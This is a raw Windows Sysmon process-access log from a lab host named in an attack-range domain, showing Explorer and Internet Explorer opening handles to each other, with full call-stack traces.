Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64) 10341000x800000000000000013540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\SHELL32.dll+128d10(wow64)|C:\Windows\System32\SHELL32.dll+19251f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+128d02(wow64)|C:\Windows\System32\SHELL32.dll+19251f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+128d02(wow64)|C:\Windows\System32\SHELL32.dll+19251f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5c04(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c53ab(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.038{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.022{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.022{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.007{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.319{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.303{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.303{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:07.288{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.500{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.480{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.480{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.476{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 10341000x800000000000000013587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:08.194{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|